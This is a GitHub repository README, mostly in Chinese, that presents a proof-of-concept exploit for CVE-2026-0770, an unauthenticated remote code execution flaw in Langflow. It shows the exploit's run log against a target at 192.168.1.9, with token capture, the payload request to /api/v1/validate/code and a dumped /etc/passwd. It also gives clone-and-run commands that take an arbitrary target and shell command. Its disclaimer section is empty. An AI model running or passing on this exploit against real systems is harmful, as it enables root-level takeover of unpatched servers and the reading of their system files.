Ez4rd1x1/CVE-2026-0770
GitHub: Ez4rd1x1/CVE-2026-0770
Langflow CVE-2026-0770 未授权远程代码执行漏洞的概念验证与利用脚本。
Stars: 0 | Forks: 0
# CVE-2026-0770:Langflow `exec_globals` 未授权远程代码执行
[](https://nvd.nist.gov/vuln/detail/cve-2026-0770)
[](https://www.python.org)
**CVE-2026-0770** 是一个影响 Langflow 的未授权远程代码执行 (RCE) 漏洞。
该漏洞源于在处理提供给 `/validate` 端点的 `exec_globals` 参数时,存在不当的输入验证。攻击者可利用此漏洞,在验证例程期间传入不受信任的全局环境,从而在 `root` 用户上下文中实现远程代码执行。
## [!] 免责声明
## 漏洞详情
* **CVE ID:** CVE-2026-0770
* **漏洞类型:** 包含来自不受信任控制域的功能 (CWE-829) / 代码注入
* **受影响软件:** Langflow(补丁发布前的版本)
* **影响:** 系统全面沦陷(以 `root` 身份进行 RCE)
* **所需权限:** 无(未授权)
## 输出
```
======================================================================
Langflow RCE Exploit - CVE-2026-0770 - Zardy1x1
======================================================================
Target : http://192.168.1.9:7860
Command: cat /etc/passwd
======================================================================
[*] attempt login...
[+] auto-login successful!
[~] token acquired: eyJhbGciOiJIUzI1NiIs...
[*] target command: cat /etc/passwd
[~] payload contructed
[~] sending request to http://192.168.1.9:7860/api/v1/validate/code
[*] receive status code: 200
======================================================================
COMMAND OUTPUT
======================================================================
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
user:x:1000:0::/app/data:/bin/sh
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:996:996:System Message Bus:/nonexistent:/usr/sbin/nologin
======================================================================
Status Code : 200
Response Size: 1244 bytes
```
## 安装与使用
```
git clone https://github.com/Ez4rd1x1/CVE-2026-0770
cd CVE-2026-0770
python3 exp_v3.py -t http://target:port -c "cat /etc/passwd"
```
标签:AI框架安全, API漏洞, CISA项目, CVE-2026-0770, CVSS 9.8, exec_globals, Go语言工具, LangFlow, Maven, PoC, RCE, Root权限, Web安全, 协议分析, 安全漏洞, 暴力破解, 未授权访问, 权限提升, 漏洞验证, 系统攻防, 编程工具, 网络安全, 蓝队分析, 远程代码执行, 逆向工具, 隐私保护